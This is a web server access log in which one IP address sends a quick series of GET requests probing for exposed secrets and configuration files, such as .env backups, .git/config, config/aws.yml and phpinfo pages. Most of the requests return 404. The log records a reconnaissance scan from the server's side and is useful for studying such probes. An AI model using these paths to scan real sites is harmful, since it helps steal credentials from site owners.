202.47.135.198 - - [23/Sep/2025:11:27:18 +0800] "GET /.env.bak HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.198 - - [23/Sep/2025:11:27:18 +0800] "GET /info.php HTTP/1.1" 200 49 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.198 - - [23/Sep/2025:11:27:20 +0800] "GET /config/aws.yml HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.198 - - [23/Sep/2025:11:27:21 +0800] "GET /_profiler/phpinfo HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.198 - - [23/Sep/2025:11:27:22 +0800] "GET /_profiler/phpinfo.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.198 - - [23/Sep/2025:11:27:23 +0800] "GET /.env.dev.local HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.198 - - [23/Sep/2025:11:27:24 +0800] "GET /infos.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.198 - - [23/Sep/2025:11:27:25 +0800] "GET /php_info.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.198 - - [23/Sep/2025:11:27:26 +0800] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.198 - - [23/Sep/2025:11:27:27 +0800] "GET /.git/config HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.198 - - [23/Sep/2025:11:27:29 +0800] "GET /configuration.php-dist HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.198 - - [23/Sep/2025:11:27:30 +0800] "GET /.config HTTP/1.1" 404 8988 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.198 - - [23/Sep/2025:11:27:31 +0800] "GET /config.json HTTP/1.1" 404 8988 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
202.47.135.198 - - [23/Sep/2025:11:27:32 +0800] "GET /debug/default/view?panel=config HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
